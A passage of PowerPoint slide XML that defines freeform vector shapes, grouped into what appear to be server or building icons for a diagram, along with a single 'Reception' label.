                    <a:gd name="T3" fmla="*/ 964 h 4342"/>
                    <a:gd name="T4" fmla="*/ 0 w 12585"/>
                    <a:gd name="T5" fmla="*/ 0 h 4342"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 4342"/>
                    <a:gd name="T8" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T9" fmla="*/ 4342 h 43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585" h="4342">
                      <a:moveTo>
                        <a:pt x="12585" y="4342"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="964"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3378"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="43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05" name="Freeform 62"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1912" y="2428"/>
                  <a:ext cx="252" cy="68"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 17020"/>
                    <a:gd name="T1" fmla="*/ 1711 h 4567"/>
                    <a:gd name="T2" fmla="*/ 10647 w 17020"/>
                    <a:gd name="T3" fmla="*/ 4567 h 4567"/>
                    <a:gd name="T4" fmla="*/ 17020 w 17020"/>
                    <a:gd name="T5" fmla="*/ 2859 h 4567"/>
                    <a:gd name="T6" fmla="*/ 6371 w 17020"/>
                    <a:gd name="T7" fmla="*/ 0 h 4567"/>
                    <a:gd name="T8" fmla="*/ 0 w 17020"/>
                    <a:gd name="T9" fmla="*/ 1711 h 45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020" h="4567">
                      <a:moveTo>
                        <a:pt x="0" y="1711"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="10647" y="4567"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="17020" y="2859"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6371" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1711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06" name="Freeform 63"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2283"/>
                  <a:ext cx="186" cy="243"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 12585"/>
                    <a:gd name="T1" fmla="*/ 0 h 16411"/>
                    <a:gd name="T2" fmla="*/ 0 w 12585"/>
                    <a:gd name="T3" fmla="*/ 13033 h 16411"/>
                    <a:gd name="T4" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T5" fmla="*/ 16411 h 16411"/>
                    <a:gd name="T6" fmla="*/ 12585 w 12585"/>
                    <a:gd name="T7" fmla="*/ 3378 h 16411"/>
                    <a:gd name="T8" fmla="*/ 0 w 12585"/>
                    <a:gd name="T9" fmla="*/ 0 h 16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585" h="16411">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="13033"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="16411"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="12585" y="337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07" name="Freeform 64"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="2045" y="2329"/>
                  <a:ext cx="14" cy="197"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 971"/>
                    <a:gd name="T1" fmla="*/ 13293 h 13293"/>
                    <a:gd name="T2" fmla="*/ 971 w 971"/>
                    <a:gd name="T3" fmla="*/ 13030 h 13293"/>
                    <a:gd name="T4" fmla="*/ 971 w 971"/>
                    <a:gd name="T5" fmla="*/ 0 h 13293"/>
                    <a:gd name="T6" fmla="*/ 0 w 971"/>
                    <a:gd name="T7" fmla="*/ 260 h 13293"/>
                    <a:gd name="T8" fmla="*/ 0 w 971"/>
                    <a:gd name="T9" fmla="*/ 13293 h 132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71" h="13293">
                      <a:moveTo>
                        <a:pt x="0" y="13293"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="971" y="13030"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="13293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6350" cap="flat" cmpd="sng">
                  <a:solidFill>
                    <a:srgbClr val="80808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08" name="Freeform 65"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm>
                  <a:off x="1859" y="2279"/>
                  <a:ext cx="200" cy="54"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T1" fmla="*/ 3378 h 3638"/>
                    <a:gd name="T2" fmla="*/ 12585 w 13556"/>
                    <a:gd name="T3" fmla="*/ 3638 h 3638"/>
                    <a:gd name="T4" fmla="*/ 0 w 13556"/>
                    <a:gd name="T5" fmla="*/ 260 h 3638"/>
                    <a:gd name="T6" fmla="*/ 971 w 13556"/>
                    <a:gd name="T7" fmla="*/ 0 h 3638"/>
                    <a:gd name="T8" fmla="*/ 13556 w 13556"/>
                    <a:gd name="T9" fmla="*/ 3378 h 36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56" h="3638">
                      <a:moveTo>
                        <a:pt x="13556" y="3378"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="12585" y="3638"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="260"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="971" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="13556" y="3378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725" name="Rectangle 724"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2331176" y="1769439"/>
              <a:ext cx="827855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Reception</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="726" name="Group 927"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="2294764" y="2623308"/>
              <a:ext cx="2036763" cy="1019175"/>
              <a:chOff x="2092" y="1676"/>
              <a:chExt cx="1283" cy="642"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="727" name="Freeform 67"/>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="gray">
              <a:xfrm>
                <a:off x="2092" y="1973"/>
                <a:ext cx="1283" cy="345"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 161"/>
                  <a:gd name="T1" fmla="*/ 22 h 44"/>
                  <a:gd name="T2" fmla="*/ 81 w 161"/>
                  <a:gd name="T3" fmla="*/ 0 h 44"/>
                  <a:gd name="T4" fmla="*/ 161 w 161"/>
                  <a:gd name="T5" fmla="*/ 22 h 44"/>
                  <a:gd name="T6" fmla="*/ 81 w 161"/>
                  <a:gd name="T7" fmla="*/ 44 h 44"/>
                  <a:gd name="T8" fmla="*/ 0 w 161"/>
                  <a:gd name="T9" fmla="*/ 2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44">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="81" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="161" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="81" y="44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2B2B2">
                      <a:gamma/>
                      <a:tint val="68627"/>
                      <a:invGamma/>
                    </a:srgbClr>
                  </a:gs>
                  <a:gs pos="100000">
                    <a:srgbClr val="B2B2B2"/>
                  </a:gs>
                </a:gsLst>
                <a:lin ang="5400000" scaled="1"/>
              </a:gradFill>
              <a:ln w="190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728" name="Group 68"/>
              <p:cNvGrpSpPr>
                <a:grpSpLocks noChangeAspect="1"/>
              </p:cNvGrpSpPr>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="2448" y="1676"/>
                <a:ext cx="356" cy="392"/>
                <a:chOff x="1278" y="1707"/>
                <a:chExt cx="1081" cy="1188"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="820" name="Freeform 69"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="1707"/>
                  <a:ext cx="1081" cy="1188"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 257 w 1280"/>
                    <a:gd name="T1" fmla="*/ 0 h 1405"/>
                    <a:gd name="T2" fmla="*/ 0 w 1280"/>
                    <a:gd name="T3" fmla="*/ 68 h 1405"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 1131 h 1405"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 1405 h 1405"/>
                    <a:gd name="T8" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T9" fmla="*/ 342 h 1405"/>
                    <a:gd name="T10" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T11" fmla="*/ 274 h 1405"/>
                    <a:gd name="T12" fmla="*/ 257 w 1280"/>
                    <a:gd name="T13" fmla="*/ 0 h 14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80" h="1405">
                      <a:moveTo>
                        <a:pt x="257" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="1405"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="6D6D6C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21" name="Freeform 70"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="2578"/>
                  <a:ext cx="1081" cy="290"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 342"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 342"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 68 h 342"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 342 h 342"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="342">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="342"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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22" name="Freeform 71"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="2353"/>
                  <a:ext cx="1081" cy="287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 272 h 340"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 340"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 66 h 340"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 340 h 340"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 272 h 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0" h="340">
                      <a:moveTo>
                        <a:pt x="1280" y="272"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="66"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="340"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="272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823" name="Group 72"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1472" y="2249"/>
                  <a:ext cx="797" cy="347"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="872" name="Group 73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031" y="2241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881" name="Freeform 7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82" name="Freeform 75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83" name="Freeform 7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73" name="Group 77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301" y="2311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878" name="Freeform 7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79" name="Freeform 79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80" name="Freeform 8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74" name="Group 81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571" y="2384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875" name="Freeform 8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76" name="Freeform 83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77" name="Freeform 8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824" name="Freeform 85"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="2129"/>
                  <a:ext cx="1081" cy="287"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 340"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 340"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 340"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 340 h 340"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 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0" h="340">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="340"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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25" name="Freeform 86"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="1902"/>
                  <a:ext cx="1081" cy="290"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T1" fmla="*/ 274 h 343"/>
                    <a:gd name="T2" fmla="*/ 257 w 1280"/>
                    <a:gd name="T3" fmla="*/ 0 h 343"/>
                    <a:gd name="T4" fmla="*/ 0 w 1280"/>
                    <a:gd name="T5" fmla="*/ 69 h 343"/>
                    <a:gd name="T6" fmla="*/ 1025 w 1280"/>
                    <a:gd name="T7" fmla="*/ 343 h 343"/>
                    <a:gd name="T8" fmla="*/ 1280 w 1280"/>
                    <a:gd name="T9" fmla="*/ 274 h 3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0" h="343">
                      <a:moveTo>
                        <a:pt x="1280" y="274"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="257" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="69"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1025" y="343"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1280" y="274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826" name="Group 87"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1472" y="2477"/>
                  <a:ext cx="797" cy="346"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="860" name="Group 88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031" y="2241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869" name="Freeform 89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70" name="Freeform 9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71" name="Freeform 91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61" name="Group 92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301" y="2311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866" name="Freeform 93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67" name="Freeform 9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68" name="Freeform 95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62" name="Group 96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571" y="2384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863" name="Freeform 97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64" name="Freeform 9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65" name="Freeform 99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827" name="Group 100"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1472" y="2021"/>
                  <a:ext cx="797" cy="347"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="848" name="Group 101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031" y="2241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857" name="Freeform 10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58" name="Freeform 103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59" name="Freeform 10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49" name="Group 105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301" y="2311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854" name="Freeform 10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55" name="Freeform 107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56" name="Freeform 10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50" name="Group 109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571" y="2384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851" name="Freeform 11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52" name="Freeform 111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53" name="Freeform 11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828" name="Group 113"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1472" y="1795"/>
                  <a:ext cx="797" cy="346"/>
                  <a:chOff x="2031" y="2241"/>
                  <a:chExt cx="797" cy="345"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:grpSp>
                <p:nvGrpSpPr>
                  <p:cNvPr id="836" name="Group 114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031" y="2241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845" name="Freeform 115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46" name="Freeform 11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47" name="Freeform 117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37" name="Group 118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301" y="2311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842" name="Freeform 119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43" name="Freeform 12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44" name="Freeform 121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38" name="Group 122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571" y="2384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839" name="Freeform 123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40" name="Freeform 12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41" name="Freeform 125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829" name="Freeform 126"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeAspect="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="gray">
                <a:xfrm flipH="1">
                  <a:off x="1278" y="1938"/>
                  <a:ext cx="215" cy="957"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 255"/>
                    <a:gd name="T1" fmla="*/ 68 h 1131"/>
                    <a:gd name="T2" fmla="*/ 0 w 255"/>
                    <a:gd name="T3" fmla="*/ 335 h 1131"/>
                    <a:gd name="T4" fmla="*/ 0 w 255"/>
                    <a:gd name="T5" fmla="*/ 375 h 1131"/>
                    <a:gd name="T6" fmla="*/ 0 w 255"/>
                    <a:gd name="T7" fmla="*/ 564 h 1131"/>
                    <a:gd name="T8" fmla="*/ 0 w 255"/>
                    <a:gd name="T9" fmla="*/ 600 h 1131"/>
                    <a:gd name="T10" fmla="*/ 0 w 255"/>
                    <a:gd name="T11" fmla="*/ 867 h 1131"/>
                    <a:gd name="T12" fmla="*/ 0 w 255"/>
                    <a:gd name="T13" fmla="*/ 900 h 1131"/>
                    <a:gd name="T14" fmla="*/ 0 w 255"/>
                    <a:gd name="T15" fmla="*/ 1131 h 1131"/>
                    <a:gd name="T16" fmla="*/ 255 w 255"/>
                    <a:gd name="T17" fmla="*/ 1063 h 1131"/>
                    <a:gd name="T18" fmla="*/ 255 w 255"/>
                    <a:gd name="T19" fmla="*/ 831 h 1131"/>
                    <a:gd name="T20" fmla="*/ 255 w 255"/>
                    <a:gd name="T21" fmla="*/ 798 h 1131"/>
                    <a:gd name="T22" fmla="*/ 255 w 255"/>
                    <a:gd name="T23" fmla="*/ 531 h 1131"/>
                    <a:gd name="T24" fmla="*/ 255 w 255"/>
                    <a:gd name="T25" fmla="*/ 496 h 1131"/>
                    <a:gd name="T26" fmla="*/ 255 w 255"/>
                    <a:gd name="T27" fmla="*/ 307 h 1131"/>
                    <a:gd name="T28" fmla="*/ 255 w 255"/>
                    <a:gd name="T29" fmla="*/ 267 h 1131"/>
                    <a:gd name="T30" fmla="*/ 255 w 255"/>
                    <a:gd name="T31" fmla="*/ 0 h 1131"/>
                    <a:gd name="T32" fmla="*/ 0 w 255"/>
                    <a:gd name="T33" fmla="*/ 68 h 1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55" h="1131">
                      <a:moveTo>
                        <a:pt x="0" y="68"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="335"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="375"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="564"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="600"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="867"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="900"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="1131"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="1063"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="831"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="798"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="531"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="496"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="307"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="267"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="255" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="68"/>
                      </a:lnTo>
                      <a:close/>
                    </a:path>
                  </a:pathLst>
                </a:custGeom>
                <a:solidFill>
                  <a:srgbClr val="828282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830" name="Group 127"/>
                <p:cNvGrpSpPr>
                  <a:grpSpLocks noChangeAspect="1"/>
                </p:cNvGrpSpPr>
                <p:nvPr/>
              </p:nvGrpSpPr>
              <p:grpSpPr bwMode="auto">
                <a:xfrm flipH="1">
                  <a:off x="1493" y="1764"/>
                  <a:ext cx="866" cy="1131"/>
                  <a:chOff x="1940" y="1770"/>
                  <a:chExt cx="868" cy="1132"/>
                </a:xfrm>
              </p:grpSpPr>
              <p:sp>
                <p:nvSpPr>
                  <p:cNvPr id="832" name="Freeform 128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940" y="2446"/>
                    <a:ext cx="868" cy="456"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 538"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 264 h 538"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 538 h 538"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 538"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 538"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 496 h 538"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 538"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 42 h 538"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 297 h 538"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 297 h 538"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 496 h 5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025" h="538">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="264"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="538"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="496"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="297"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="297"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="496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3" name="Freeform 129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940" y="2220"/>
                    <a:ext cx="868" cy="458"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 541"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 267 h 541"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 541 h 541"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 541"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 541"/>
                      <a:gd name="T10" fmla="*/ 992 w 1025"/>
                      <a:gd name="T11" fmla="*/ 498 h 541"/>
                      <a:gd name="T12" fmla="*/ 33 w 1025"/>
                      <a:gd name="T13" fmla="*/ 241 h 541"/>
                      <a:gd name="T14" fmla="*/ 33 w 1025"/>
                      <a:gd name="T15" fmla="*/ 42 h 541"/>
                      <a:gd name="T16" fmla="*/ 992 w 1025"/>
                      <a:gd name="T17" fmla="*/ 300 h 541"/>
                      <a:gd name="T18" fmla="*/ 992 w 1025"/>
                      <a:gd name="T19" fmla="*/ 300 h 541"/>
                      <a:gd name="T20" fmla="*/ 992 w 1025"/>
                      <a:gd name="T21" fmla="*/ 498 h 5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025" h="541">
                        <a:moveTo>
                          <a:pt x="0" y="0"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="0" y="267"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="541"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="1025" y="274"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="0" y="0"/>
                        </a:lnTo>
                        <a:close/>
                        <a:moveTo>
                          <a:pt x="992" y="498"/>
                        </a:moveTo>
                        <a:lnTo>
                          <a:pt x="33" y="241"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="33" y="42"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="300"/>
                        </a:lnTo>
                        <a:lnTo>
                          <a:pt x="992" y="498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4" name="Freeform 130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940" y="1996"/>
                    <a:ext cx="868" cy="456"/>
                  </a:xfrm>
                  <a:custGeom>
                    <a:avLst/>
                    <a:gdLst>
                      <a:gd name="T0" fmla="*/ 0 w 1025"/>
                      <a:gd name="T1" fmla="*/ 0 h 539"/>
                      <a:gd name="T2" fmla="*/ 0 w 1025"/>
                      <a:gd name="T3" fmla="*/ 265 h 539"/>
                      <a:gd name="T4" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T5" fmla="*/ 539 h 539"/>
                      <a:gd name="T6" fmla="*/ 1025 w 1025"/>
                      <a:gd name="T7" fmla="*/ 274 h 539"/>
                      <a:gd name="T8" fmla="*/ 0 w 1025"/>
                      <a:gd name="T9" fmla="*/ 0 h 539"/>
